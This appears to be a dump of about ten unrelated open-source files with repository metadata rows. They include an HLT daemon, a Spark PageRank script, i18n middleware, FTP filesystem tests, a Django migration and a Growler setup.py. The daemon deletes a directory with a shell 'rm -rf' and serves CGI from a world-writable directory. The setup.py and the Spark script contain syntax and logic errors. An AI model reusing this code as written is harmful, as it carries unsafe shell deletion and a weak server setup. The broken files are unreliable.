infile = fileHandler(event.fullpath)
if infile.data=={}:emptyBox=True
#check which time is later (in case of small clock skew and small difference)
if current_datetime > dateutil.parser.parse(infile.data['fm_date']):
dt = (current_datetime - dateutil.parser.parse(infile.data['fm_date'])).seconds
else:
dt = -(dateutil.parser.parse(infile.data['fm_date'])-current_datetime).seconds
if dt > 5:
logger.warning('setting stale flag for resource '+basename + ' which is '+str(dt)+' seconds behind')
#should be << 1s if NFS is responsive, set stale handle flag
infile.data['detectedStaleHandle']=True
elif dt < -5:
logger.error('setting stale flag for resource '+basename + ' which is '+str(dt)+' seconds ahead (clock skew)')
infile.data['detectedStaleHandle']=True
boxinfoFUMap[basename] = [infile.data,current_time,True]
except Exception as ex:
if not emptyBox:
logger.error("Unable to read of parse boxinfo file "+basename)
logger.exception(ex)
else:
logger.warning("got empty box file "+basename)
try:
boxinfoFUMap[basename][2]=False
except:
#boxinfo entry doesn't exist yet
boxinfoFUMap[basename]=[None,current_time,False]
def checkNotifiedBoxes(self,runNumber):
keys = boxinfoFUMap.keys()
c_time = time.time()
for key in keys:
#if key==thishost:continue #checked in inotify thread
try:
edata,etime,lastStatus = boxinfoFUMap[key]
except:
#key deleted
return False,False
if c_time - etime > 20:continue
#parsing or file access, check failed
if lastStatus==False: return False,False
try:
#run is found in at least one box
if runNumber in edata['activeRuns']:return True,True
except:
#invalid boxinfo data
return False,False
#all box data are valid, run not found
return True,False
def checkBoxes(self,runNumber):
checkSuccessful=True
runFound=False
ioErrCount=0
valErrCount=0
files = os.listdir(self.regpath[-1])
c_time = time.time()
for file in files:
if file == thishost:continue
#ignore file if it is too old (FU with a problem)
filename = os.path.join(dir,file)
if c_time - os.path.getmtime(filename) > 20:continue
try:
with open(filename,'r') as fp:
doc = json.load(fp)
except IOError as ex:
checkSuccessful=False
break
except ValueError as ex:
checkSuccessful=False
break
except Exception as ex:
logger.exception(ex)
checkSuccessful=False
break;
try:
if runNumber in doc['activeRuns']:
runFound=True
break;
except Exception as ex:
logger.exception(ex)
checkSuccessful=False
break
return checkSuccessful,runFound
class hltd(Daemon2,object):
def __init__(self, instance):
self.instance=instance
Daemon2.__init__(self,'hltd',instance,'hltd')
def stop(self):
#read configuration file
try:
setFromConf(self.instance)
except Exception as ex:
print " CONFIGURATION error:",str(ex),"(check configuration file) [ \033[1;31mFAILED\033[0;39m ]"
sys.exit(4)
if self.silentStatus():
try:
if os.path.exists(conf.watch_directory+'/populationcontrol'):
os.remove(conf.watch_directory+'/populationcontrol')
fp = open(conf.watch_directory+'/populationcontrol','w+')
fp.close()
count = 10
while count:
os.stat(conf.watch_directory+'/populationcontrol')
if count==10:
sys.stdout.write(' o.o')
else:
sys.stdout.write('o.o')
sys.stdout.flush()
time.sleep(.5)
count-=1
except OSError, err:
time.sleep(.1)
pass
except IOError, err:
time.sleep(.1)
pass
super(hltd,self).stop()
def run(self):
"""
if role is not defined in the configuration (which it shouldn't)
infer it from the name of the machine
"""
#read configuration file
setFromConf(self.instance)
logger.info(" ")
logger.info(" ")
logger.info("[[[[ ---- hltd start : instance " + self.instance + " ---- ]]]]")
logger.info(" ")
if conf.enabled==False:
logger.warning("Service is currently disabled.")
sys.exit(1)
if conf.role == 'fu':
"""
cleanup resources
"""
global cloud_mode
is_in_cloud = len(os.listdir(cloud))>0
while True:
#switch to cloud mode if cloud files are found (e.g. machine rebooted while in cloud)
if is_in_cloud:
logger.warning('found cores in cloud. this session will start in the cloud mode')
try:
move_resources_to_cloud()
except:
pass
cloud_mode=True
if is_cloud_inactive():
ignite_cloud()
break
if cleanup_resources()==True:break
time.sleep(0.1)
logger.warning("retrying cleanup_resources")
"""
recheck mount points
this is done at start and whenever the file /etc/appliance/bus.config is modified
mount points depend on configuration which may be updated (by runcontrol)
(notice that hltd does not NEED to be restarted since it is watching the file all the time)
"""
cleanup_mountpoints()
calculate_threadnumber()
try:
os.makedirs(conf.watch_directory)
except:
pass
#recursively remove any stale run data and other commands in the FU watch directory
#if conf.watch_directory.strip()!='/':
# p = subprocess.Popen("rm -rf " + conf.watch_directory.strip()+'/{run*,end*,quarantined*,exclude,include,suspend*,populationcontrol,herod,logrestart,emu*}',shell=True)
# p.wait()
if conf.watch_directory.startswith('/fff'):
p = subprocess.Popen("rm -rf " + conf.watch_directory+'/*',shell=True)
p.wait()
global fu_watchdir_is_mountpoint
if os.path.ismount(conf.watch_directory):fu_watchdir_is_mountpoint=True
#switch to cloud mode if active and hltd did not have cores in cloud directory in the last session
if not is_in_cloud:
if not is_cloud_inactive():
logger.warning("cloud is on on this host at hltd startup, switching to cloud mode")
move_resources_to_cloud()
cloud_mode=True
if conf.role == 'bu':
global machine_blacklist
#update_success,machine_blacklist=updateBlacklist()
machine_blacklist=[]
global ramdisk_submount_size
if self.instance == 'main':
#if there are other instance mountpoints in ramdisk, they will be subtracted from size estimate
ramdisk_submount_size = submount_size(conf.watch_directory)
"""
the line below is a VERY DIRTY trick to address the fact that
BU resources are dynamic hence they should not be under /etc
"""
conf.resource_base = conf.watch_directory+'/appliance' if conf.role == 'bu' else conf.resource_base
#@SM:is running from symbolic links still needed?
watch_directory = os.readlink(conf.watch_directory) if os.path.islink(conf.watch_directory) else conf.watch_directory
resource_base = os.readlink(conf.resource_base) if os.path.islink(conf.resource_base) else conf.resource_base
global runList
runList = RunList()
if conf.use_elasticsearch == True:
time.sleep(.2)
restartLogCollector(self.instance)
#start boxinfo elasticsearch updater
global nsslock
global boxInfo
boxInfo = None
if conf.role == 'bu':
try:os.makedirs(os.path.join(watch_directory,'appliance/dn'))
except:pass
try:os.makedirs(os.path.join(watch_directory,'appliance/boxes'))
except:pass
if conf.use_elasticsearch == True:
boxInfo = BoxInfoUpdater(watch_directory,conf,nsslock,boxdoc_version)
boxInfo.start()
runRanger = RunRanger(self.instance)
runRanger.register_inotify_path(watch_directory,inotify.IN_CREATE)
runRanger.start_inotify()
logger.info("started RunRanger - watch_directory " + watch_directory)
appliance_base=resource_base
if resource_base.endswith('/'):
resource_base = resource_base[:-1]
if resource_base.rfind('/')>0:
appliance_base = resource_base[:resource_base.rfind('/')]
rr = ResourceRanger()
try:
if conf.role == 'bu':
imask = inotify.IN_CLOSE_WRITE | inotify.IN_DELETE | inotify.IN_CREATE | inotify.IN_MOVED_TO
rr.register_inotify_path(resource_base, imask)
rr.register_inotify_path(resource_base+'/boxes', imask)
else:
#status file for cloud
#with open(os.path.join(watch_directory,'mode'),'w') as fp:
# json.dump({"mode":"hlt"},fp))
#
imask_appl = inotify.IN_MODIFY
imask = inotify.IN_MOVED_TO
rr.register_inotify_path(appliance_base, imask_appl)
rr.register_inotify_path(resource_base+'/idle', imask)
rr.register_inotify_path(resource_base+'/cloud', imask)
rr.register_inotify_path(resource_base+'/except', imask)
rr.start_inotify()
logger.info("started ResourceRanger - watch_directory "+resource_base)
except Exception as ex:
logger.error("Exception caught in starting ResourceRanger notifier")
logger.error(ex)
try:
cgitb.enable(display=0, logdir="/tmp")
handler = CGIHTTPServer.CGIHTTPRequestHandler
# the following allows the base directory of the http
# server to be 'conf.watch_directory, which is writeable
# to everybody
if os.path.exists(watch_directory+'/cgi-bin'):
os.remove(watch_directory+'/cgi-bin')
os.symlink('/opt/hltd/cgi',watch_directory+'/cgi-bin')
handler.cgi_directories = ['/cgi-bin']
logger.info("starting http server on port "+str(conf.cgi_port))
httpd = BaseHTTPServer.HTTPServer(("", conf.cgi_port), handler)
logger.info("hltd serving at port "+str(conf.cgi_port)+" with role "+conf.role)
os.chdir(watch_directory)
logger.info("[[[[ ---- hltd instance " + self.instance + ": init complete, starting httpd ---- ]]]]")
logger.info("")
httpd.serve_forever()
except KeyboardInterrupt:
logger.info("stop signal detected")
aRuns = runList.getActiveRuns()
if len(aRuns)>0:
logger.info("terminating all ongoing runs")
for run in aRuns:
if conf.role=='fu':
run.Shutdown(True,True)
elif conf.role=='bu':
run.ShutdownBU()
logger.info("terminated all ongoing runs")
runRanger.stop_inotify()
rr.stop_inotify()
if boxInfo is not None:
logger.info("stopping boxinfo updater")
boxInfo.stop()
global logCollector
if logCollector is not None:
logger.info("terminating logCollector")
logCollector.terminate()
logger.info("stopping system monitor")
rr.stop_managed_monitor()
logger.info("closing httpd socket")
httpd.socket.close()
logger.info(threading.enumerate())
logger.info("unmounting mount points")
if cleanup_mountpoints(remount=False)==False:
time.sleep(1)
cleanup_mountpoints(remount=False)
logger.info("shutdown of service (main thread) completed")
except Exception as ex:
logger.info("exception encountered in operating hltd")
logger.info(ex)
runRanger.stop_inotify()
rr.stop_inotify()
rr.stop_managed_monitor()
raise
if __name__ == "__main__":
import procname
procname.setprocname('hltd')
daemon = hltd(sys.argv[1])
daemon.start()
| lgpl-3.0 | -3,724,914,407,503,321,000 | 42.565243 | 194 | 0.517367 | false | 4.569912 | false | false | false |
firiceguo/Recommendation-NLP | src/network/network.py | 1 | 5711 | #!/usr/bin/python2
# -*- coding: utf-8 -*-
from pyspark.sql.functions import *
from graphframes import *
"""
If you do it on the Jupyter Notebook, do the following config.
%%configure -f
{ "conf": {"spark.jars.packages": "graphframes:graphframes:0.3.0-spark2.0-s_2.11" }}
sc.addPyFile('wasb://[email protected]/graphframes-0.3.0-spark2.0-s_2.11.jar')
"""
def network(sc, spark):
# step1: create graph according to yelp network data
v = spark.read.csv(
'https://[email protected]/yelpNetwork_i.csv', header=True, inferSchema=True)
# v.count() 1029432
e = spark.read.csv(
'wasb://[email protected]/yelpNetwork_e.csv', header=True, inferSchema=True)
# e.count() 29723247
g = GraphFrame(v, e)
# step2: we need to make sure that this graph is a directed graph
# then we can run pagerank algorithm on it
a = g.inDegrees
# b=g.outDegrees.withColumnRenamed('id','out_id')
b = g.outDegrees
# inOut=a.join(b,a['id']==b['out_id'])
inOut = a.join(b, 'id')
static = inOut.select(
'*', (inOut['inDegree'] / inOut['outDegree']).alias('ratio')).select('id', 'ratio')
bio_ratio = float(static.filter("ratio=1").count()) / \
float(g.vertices.count())
print bio_ratio
# step3: detect connected component
sc.setCheckpointDir(
'wasb://[email protected]/checkpoint')
result = g.connectedComponents()
r = result.select("id", "component")
r.groupBy('component').count().orderBy('count', ascending=False).show()
# step4: choose the largest connected component, create a new subset
# graph, and run pagerank algorithm on this new graph
subset_0 = result.filter('component=0')
subset_id = subset_0.select('id')
subset_edge = e.join(subset_id, e['dst'] == subset_0['id'], 'leftsemi').join(
subset_id, e['src'] == subset_0['id'], 'leftsemi')
g_cc = GraphFrame(subset_id, subset_edge)
pr = g_cc.pageRank(resetProbability=0.01, maxIter=10)
pr.vertices.select("id", "pagerank").orderBy(
"pagerank", ascending=False).show()
# step5: we want to get the max pagerank vertices for each business, so we
# need (business_id,user_id) pair, extracted from review
review = spark.read.csv(
'wasb://[email protected]/yelpNetwork_b_u.csv', header=True, inferSchema=True)
# but if the number of one business's comment is too small, it will be meaningless for them to distribute coupons according
# to this network's results, for they do not have enough data and do not have enough user to expand influence in cascanding.
# so we first groupBy business id and extract subset of business whose users' number is more than 100
# we consider these business is meaningful to use max pagerank user to express their coupons or make advertisement influence
# on new dishes or event
# in order to avoid spark bug on groupBy, we add withColumnRenamed before
# every groupBy operation
cnt = review.withColumnRenamed('business_id', 'business_id').groupBy(
'business_id').count().filter('count>200')
subset = cnt.join(review, 'business_id')
# pr_results_business=pr.join(subset,pr['id']==subset['user_id']).select("user_id","pagerank","business_id") /
# .withColumnRenamed('business_id','business_id').groupBy('business_id').max()
pr_table = pr.vertices.select("id", "pagerank").orderBy(
"pagerank", ascending=False)
pr_results_business = pr_table.join(
subset, pr_table['id'] == subset['user_id'])
pr_results_business.select("user_id", "pagerank", "business_id").show()
t1 = pr_results_business.select("user_id", "pagerank", "business_id").withColumnRenamed(
'business_id', 'business_id').groupBy('business_id').max()
t2 = t1.join(pr_table, t1['max(pagerank)'] == pr_table['pagerank']).withColumnRenamed(
'id', 'user_id').select('business_id', 'user_id')
t2.show()
# step6: write result into csv file.
# For default setting, spark will write it into multi-csvfile
# distributely, we need to merge them into one csv file.
import os
from subprocess import call
t2.write.format('com.databricks.spark.csv').save(
'wasb://[email protected]/result.csv')
os.system("cat wasb://[email protected]/result/p* > wasb://[email protected]/result.csv")
pr_table.write.format('com.databricks.spark.csv').save(
'wasb://[email protected]/pr.csv')
os.system("cat wasb://[email protected]/pr/p* > wasb://[email protected]/pr.csv")
# evaluation
res = spark.read.csv(
'wasb://[email protected]/result.csv', header=True, inferSchema=True)
cnt = 0
lgt = 0
for row in res.rdd.collect():
id = row['user_id']
print id
con = "a.id='" + id + "'"
con = str(con)
print con
top = g.find(
"(a)-[]->(b);(b)-[]->(c)").filter(con).select("c.id").distinct().count()
print top
test = v.rdd.takeSample(False, 1, seed=cnt)
for t in test:
random = t['id']
con1 = "a.id='" + random + "'"
con1 = str(con1)
random = g.find(
"(a)-[]->(b);(b)-[]->(c)").filter(con1).select("c.id").distinct().count()
print random
if top > random:
lgt = lgt + 1
cnt = cnt + 1
# ratio: 96.7%, means it's meaningful to use this system to recommend
# users for business
| mit | -1,295,650,255,247,782,100 | 42.930769 | 135 | 0.639993 | false | 3.235694 | false | false | false |
quantrocket-llc/quantrocket-client | quantrocket/cli/utils/output.py | 1 | 1958 | # Copyright 2017 QuantRocket - All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import yaml
import json
import requests
def json_to_cli(func, *args, **kwargs):
"""
Converts a JSON response to a more appropriate CLI response.
If JSON is preferred, the response will be returned as-is. Otherwise:
- If the JSON is a list of scalars, the output will be simplified to a
string of newline-separated values suitable for the command line (unless
simplify_lists is False).
- If the JSON is empty, nothing will be returned.
- YAML will be returned.
"""
exit_code = 0
simplify_list = kwargs.pop("simplify_list", True)
try:
json_response = func(*args, **kwargs)
except requests.exceptions.HTTPError as e:
# use json response from service, if available
json_response = getattr(e, "json_response", {}) or {"status": "error", "msg": repr(e)}
exit_code = 1
if not json_response:
return None, exit_code
if os.environ.get("QUANTROCKET_CLI_OUTPUT_FORMAT", "").lower() == "json":
return json.dumps(json_response), exit_code
if simplify_list and isinstance(json_response, list) and not any([
isinstance(item, (dict, list, tuple, set)) for item in json_response]):
return "\n".join([str(item) for item in json_response]), exit_code
return yaml.safe_dump(json_response, default_flow_style=False).strip(), exit_code
| apache-2.0 | 7,578,797,005,245,311,000 | 38.959184 | 94 | 0.695608 | false | 3.963563 | false | false | false |
limodou/uliweb | uliweb/contrib/i18n/middle_i18n.py | 1 | 3448 | import re
from uliweb.i18n import set_language, format_locale
from uliweb import Middleware
from logging import getLogger
from uliweb.utils.common import request_url
accept_language_re = re.compile(r'''
([A-Za-z]{1,8}(?:-[A-Za-z]{1,8})*|\*) # "en", "en-au", "x-y-z", "*"
(?:;q=(0(?:\.\d{,3})?|1(?:.0{,3})?))? # Optional "q=1.00", "q=0.8"
(?:\s*,\s*|$) # Multiple accepts per header.
''', re.VERBOSE)
def get_language_from_request(request, settings):
#check query_string, and the key will be defined in settings.ini
#now only support GET method
debug = '__debug__' in request.GET
log = getLogger(__name__)
url_lang_key = settings.get_var('I18N/URL_LANG_KEY')
if url_lang_key:
lang = request.GET.get(url_lang_key)
if lang:
if debug:
log.info('Detect from URL=%s, lang_key=%s, lang=%s' %
(request_url(), url_lang_key, lang))
return lang
#check session
if hasattr(request, 'session'):
lang = request.session.get('uliweb_language')
if lang:
if debug:
log.info('Detect from session=%s, lang=%s' %
('uliweb_language', lang))
return lang
#check cookie
lang = request.cookies.get(settings.I18N.LANGUAGE_COOKIE_NAME)
if lang:
if debug:
log.info('Detect from cookie=%s, lang=%s' %
(settings.I18N.LANGUAGE_COOKIE_NAME, lang))
return lang
#check browser HTTP_ACCEPT_LANGUAGE head
accept = request.environ.get('HTTP_ACCEPT_LANGUAGE', None)
if not accept:
if debug:
log.info('Detect from settings of LANGUAGE_CODE=%s' % lang)
return settings.I18N.get('LANGUAGE_CODE')
languages = settings.I18N.get('SUPPORT_LANGUAGES', [])
for accept_lang, unused in parse_accept_lang_header(accept):
if accept_lang == '*':
break
normalized = format_locale(accept_lang)
if not normalized:
continue
if normalized in languages:
if debug:
log.info('Detect from HTTP Header=%s, lang=%s' %
('HTTP_ACCEPT_LANGUAGE', normalized))
return normalized
#return default lanaguage
lang = settings.I18N.get('LANGUAGE_CODE')
if debug:
log.info('Detect from settings of LANGUAGE_CODE=%s' % lang)
return lang
def parse_accept_lang_header(lang_string):
"""
Parses the lang_string, which is the body of an HTTP Accept-Language
header, and returns a list of (lang, q-value), ordered by 'q' values.
Any format errors in lang_string results in an empty list being returned.
"""
result = []
pieces = accept_language_re.split(lang_string)
if pieces[-1]:
return []
for i in range(0, len(pieces) - 1, 3):
first, lang, priority = pieces[i : i + 3]
if first:
return []
priority = priority and float(priority) or 1.0
result.append((lang, priority))
result.sort(lambda x, y: -cmp(x[1], y[1]))
return result
class I18nMiddle(Middleware):
def process_request(self, request):
lang = get_language_from_request(request, self.settings)
if lang:
set_language(lang) | bsd-2-clause | 3,296,269,799,420,879,400 | 33.9375 | 79 | 0.560325 | false | 3.784852 | false | false | false |
david-abel/simple_rl | examples/oomdp_example.py | 1 | 1115 | #!/usr/bin/env python
# Python imports.
import sys
# Other imports.
import srl_example_setup
from simple_rl.agents import QLearningAgent, RandomAgent
from simple_rl.tasks import TaxiOOMDP
from simple_rl.run_experiments import run_agents_on_mdp, run_single_agent_on_mdp
def main(open_plot=True):
# Taxi initial state attributes..
agent = {"x":1, "y":1, "has_passenger":0}
passengers = [{"x":3, "y":2, "dest_x":2, "dest_y":3, "in_taxi":0}]
walls = []
mdp = TaxiOOMDP(width=4, height=4, agent=agent, walls=walls, passengers=passengers)
# Agents.
ql_agent = QLearningAgent(actions=mdp.get_actions())
rand_agent = RandomAgent(actions=mdp.get_actions())
viz = False
if viz:
# Visualize Taxi.
run_single_agent_on_mdp(ql_agent, mdp, episodes=50, steps=1000)
mdp.visualize_agent(ql_agent)
else:
# Run experiment and make plot.
run_agents_on_mdp([ql_agent, rand_agent], mdp, instances=10, episodes=1, steps=500, reset_at_terminal=True, open_plot=open_plot)
if __name__ == "__main__":
main(open_plot=not sys.argv[-1] == "no_plot")
| apache-2.0 | -7,784,361,188,939,700,000 | 32.787879 | 136 | 0.658296 | false | 2.829949 | false | false | false |
pscottdevos/pyfilesystem | fs/tests/test_ftpfs.py | 11 | 3291 | #!/usr/bin/env python
from fs.tests import FSTestCases, ThreadingTestCases
import unittest
import os
import sys
import shutil
import tempfile
import subprocess
import time
from os.path import abspath
import urllib
from six import PY3
try:
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer
except ImportError:
if not PY3:
raise ImportError("Requires pyftpdlib <http://code.google.com/p/pyftpdlib/>")
from fs.path import *
from fs import ftpfs
ftp_port = 30000
class TestFTPFS(unittest.TestCase, FSTestCases, ThreadingTestCases):
__test__ = not PY3
def setUp(self):
global ftp_port
ftp_port += 1
use_port = str(ftp_port)
#ftp_port = 10000
self.temp_dir = tempfile.mkdtemp(u"ftpfstests")
file_path = __file__
if ':' not in file_path:
file_path = abspath(file_path)
# Apparently Windows requires values from default environment, so copy the exisiting os.environ
env = os.environ.copy()
env['PYTHONPATH'] = os.getcwd() + os.pathsep + env.get('PYTHONPATH', '')
self.ftp_server = subprocess.Popen([sys.executable,
file_path,
self.temp_dir,
use_port],
stdout=subprocess.PIPE,
env=env)
# Block until the server writes a line to stdout
self.ftp_server.stdout.readline()
# Poll until a connection can be made
start_time = time.time()
while time.time() - start_time < 5:
try:
ftpurl = urllib.urlopen('ftp://127.0.0.1:%s' % use_port)
except IOError:
time.sleep(0)
else:
ftpurl.read()
ftpurl.close()
break
else:
# Avoid a possible infinite loop
raise Exception("Unable to connect to ftp server")
self.fs = ftpfs.FTPFS('127.0.0.1', 'user', '12345', dircache=True, port=use_port, timeout=5.0)
self.fs.cache_hint(True)
def tearDown(self):
#self.ftp_server.terminate()
if sys.platform == 'win32':
os.popen('TASKKILL /PID '+str(self.ftp_server.pid)+' /F')
else:
os.system('kill '+str(self.ftp_server.pid))
shutil.rmtree(self.temp_dir)
self.fs.close()
def check(self, p):
check_path = self.temp_dir.rstrip(os.sep) + os.sep + p
return os.path.exists(check_path.encode('utf-8'))
if __name__ == "__main__":
# Run an ftp server that exposes a given directory
import sys
authorizer = DummyAuthorizer()
authorizer.add_user("user", "12345", sys.argv[1], perm="elradfmw")
authorizer.add_anonymous(sys.argv[1])
#def nolog(*args):
# pass
#ftpserver.log = nolog
#ftpserver.logline = nolog
handler = FTPHandler
handler.authorizer = authorizer
address = ("127.0.0.1", int(sys.argv[2]))
#print address
ftpd = FTPServer(address, handler)
sys.stdout.write('serving\n')
sys.stdout.flush()
ftpd.serve_forever()
| bsd-3-clause | -4,249,187,715,346,728,000 | 28.383929 | 103 | 0.576724 | false | 3.844626 | true | false | false |
shenghaozou/PythonGrader | P5/outputCon.py | 1 | 2766 | from openpyxl import Workbook
from webview import WebView
import gradeSettings
class outputControl():
def __init__(self, sectionList, name, submissionFolder):
self.sectionList = sectionList
self.name = name
self.database = {}
self.submissionFolder = submissionFolder
self.section = dict([(sect,{'workbook':Workbook(),'webview': WebView(name + '-' + sect + '-' + submissionFolder + '.html', submissionFolder)}) for sect in sectionList])
for key in self.section:
self.section[key]['worksheet'] = self.section[key]['workbook'].active
self.section[key]['webview'].createBody()
self.section[key]['webview'].insertTitle('Auto Grading Sheet For ' + name + ' Section:' + key)
self.section[key]['webview'].createGradingTable()
self.section[key]['worksheet'].append(['Student Name','Student UID','Comment']+ gradeSettings.GRADING_RULES_ORDER)
def close(self):
for key in self.section:
self.section[key]['webview'].endTable()
self.section[key]['webview'].endBody()
self.section[key]['workbook'].save('../' + self.name + '-' + key + '-' + self.submissionFolder +".xlsx")
def insert(self, studentName, studentID, submissionNum, partner, section, errorMessage, detailedGrade, output, fileName):
if studentID in self.database.keys():
print 'insert student:', studentID
if submissionNum < self.database[studentID]['submissionNum']:
return False
self.database[studentID] = {
'studentName':studentName,
'studentID':studentID,
'submissionNum':submissionNum,
'partner':partner,
'section':section,
'errorMessage':errorMessage,
'detailedGrade':detailedGrade,
'output':output,
'fileName':fileName
}
def dump(self):
for key, values in self.database.iteritems():
self.section[values['section']]['webview'].insertGradingTable(values['studentName'],
key,
values['partner'],
sum(values['detailedGrade']),
values['errorMessage'],
values['fileName'])
self.section[values['section']]['worksheet'].append([values['studentName'], key, values['output'].replace(';','\n')] + values['detailedGrade'])
self.close()
| apache-2.0 | 3,316,845,398,057,321,000 | 46.689655 | 176 | 0.530007 | false | 4.886926 | false | false | false |
emoitzi/django-excel-viewer | frontend/migrations/0001_initial.py | 1 | 1147 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('excel_import', '0007_document_current'),
]
operations = [
migrations.CreateModel(
name='ChangeRequest',
fields=[
('id', models.AutoField(serialize=False, auto_created=True, primary_key=True, verbose_name='ID')),
('new_value', models.CharField(max_length=255)),
('old_value', models.CharField(max_length=255, blank=True)),
('created_on', models.DateTimeField(auto_now_add=True)),
('accepted_on', models.DateTimeField(null=True, blank=True)),
('accepted_by', models.ForeignKey(null=True, related_name='+', blank=True, to=settings.AUTH_USER_MODEL)),
('author', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
('target_cell', models.ForeignKey(to='excel_import.Cell')),
],
),
]
| gpl-3.0 | -3,576,765,931,572,799,500 | 38.551724 | 121 | 0.598954 | false | 4.201465 | false | false | false |
pyGrowler/growler-vhost | setup.py | 1 | 1789 | #
# setup.py
#
from setuptools import setup
import growler_vhost
NAME = "growler_vhost"
desc = """The Growler vhost server acts as forwarding agent for HTTP requests to
multiple domains hosted from a single server."""
description = """The Growler vhost server acts as forwarding agent for HTTP
requests to multiple domains hosted from a single server. This is an
implementation of the service using the _Growler_ microframework to handle the
incoming request. As with everything Growler, all events are asynchronous, and
handled when-needed.
This package comes as a binary, which can be run in the form of `growler-vhost
-c <config_file>`, specifying the path to the config file to use as parameters.
I have a hope that optimizations can be made such that forwarding the request to
another growler server takes (almost) no extra resources. As the request can
easily be parsed once into the format that the growler application already uses.
We are a long way from that, though.
"""
REQUIRES = [
'growler'
]
KEYWORDS = [
'vhost',
'virtual server'
]
CLASSIFIERS = [
"Development Status :: 2 - Pre-Alpha",
# "Framework :: Growler",
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.4",
"Topic :: Internet :: WWW/HTTP",
"Natural Language :: English"
],
setup(
name=NAME,
version=growler_vhost.__version__,
author=growler_vhost.__author__,
license=growler_vhost.__license__,
url=growler_vhost.__version__,
author_email=growler_vhost.__contact__,
description=desc,
long_description=description,
classifiers=CLASSIFIERS
install_requires = ['growler'],
packages = ['growler_vhost']
)
| apache-2.0 | -6,473,186,051,370,596,000 | 27.854839 | 80 | 0.711571 | false | 3.914661 | false | false | false |
mfherbst/spack | var/spack/repos/builtin/packages/r-globaloptions/package.py | 5 | 1878 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RGlobaloptions(RPackage):
"""It provides more controls on the option values such as validation and
filtering on the values, making options invisible or private."""
homepage = "https://cran.r-project.org/package=GlobalOptions"
url = "https://cran.rstudio.com/src/contrib/GlobalOptions_0.0.12.tar.gz"
list_url = "https://cran.r-project.org/src/contrib/Archive/GlobalOptions"
version('0.0.12', '6c268b3b27874918ba62eb0f6aa0a3e5')
depends_on('r-testthat', type=('build', 'run'))
depends_on('r-knitr', type=('build', 'run'))
depends_on('r-markdown', type=('build', 'run'))
| lgpl-2.1 | -6,516,717,663,214,309,000 | 45.95 | 81 | 0.676251 | false | 3.872165 | false | false | false |
perfectsearch/sandman | test/buildscripts/disable_unit_test_test.py | 1 | 2851 | #!/usr/bin/env python
#
# $Id: DisabledUnitTestTest.py 4193 2011-01-04 23:19:42Z dhh1969 $
#
# Proprietary and confidential.
# Copyright $Date:: 2011#$ Perfect Search Corporation.
# All rights reserved.
#
import sys, os, _testcase
from unittest2 import TestCase, skip
from codescan.disabled_unit_test import *
from testsupport import checkin, officialbuild
# We're beginning the string constant in an odd way so we don't
# cause this file to show up in the list of those containing
# a disabled unit test.
DESC = '/' + '''*
UNIT TEST TEMPORARILY DISABLED
By: your name
When: 2011-02-27
Ticket: #295
Which: testFoo
Where: all 32-bit platforms
Owner: [email protected], [email protected]
Why: description of problem, including copy-and-paste
from error log
*/'''
PREFIX = '''
#if 0
this is inactive text
#if 1
this is also inactive
#endif
#endif
/**
* some more text that's inactive
*/
''' + DESC
OFFSET = PREFIX.find(DESC)
CPP_SUFFIX1 = '''
// a comment
SIMPLE_TEST(foo)'''
CPP_SUFFIX2 = '''/*
SOME MORE COMMENTS
*/
class SpecialTest: public SomethingTest {
}'''
JAVA_SUFFIX = '''//@Test
public void testSomething() {
}'''
@skip("9/16/2011 this test can't be run until we finish work on the test runner -- Julie Jones")
@officialbuild
class DisabledUnitTestTest(_testcase.TestCaseEx):
def validateDut(self, dut, errors):
errors += self.checkProp(dut, 'ticket', '295')
errors += self.checkProp(dut, 'which', 'testFoo')
errors += self.checkProp(dut, 'where', 'all 32-bit platforms')
errors += self.checkProp(dut, 'when', '2011-02-27')
errors += self.checkProp(dut, 'by', 'your name')
errors += self.checkProp(dut, 'owner', '[email protected], [email protected]')
errors += self.checkProp(dut, 'why', 'description of problem, including copy-and-paste from error log')
errorsX = self.checkProp(dut, 'lineNum', '11')
if errorsX:
self.printWithLineNums(txt)
self.assertEquals(0, errors)
def testDisabledUnitTestPropertiesCppSuffix1(self):
txt = PREFIX + CPP_SUFFIX1
dut = DisabledUnitTest('bar/footest.cpp', txt, OFFSET, OFFSET + len(DESC))
errors = self.checkProp(dut, 'path', 'bar/footest.cpp')
self.validateDut(dut, errors)
def testDisabledUnitTestPropertiesCppSuffix2(self):
txt = PREFIX + CPP_SUFFIX2
dut = DisabledUnitTest('bar/footest.cpp', txt, OFFSET, OFFSET + len(DESC))
errors = self.checkProp(dut, 'path', 'bar/footest.cpp')
self.validateDut(dut, errors)
def testDisabledUnitTestPropertiesJavaSuffix(self):
txt = PREFIX + JAVA_SUFFIX
dut = DisabledUnitTest('bar/footest.java', txt, OFFSET, OFFSET + len(DESC))
errors = self.checkProp(dut, 'path', 'bar/footest.java')
self.validateDut(dut, errors)
| mit | 8,718,279,735,128,515,000 | 30.677778 | 111 | 0.672396 | false | 3.334503 | true | false | false |
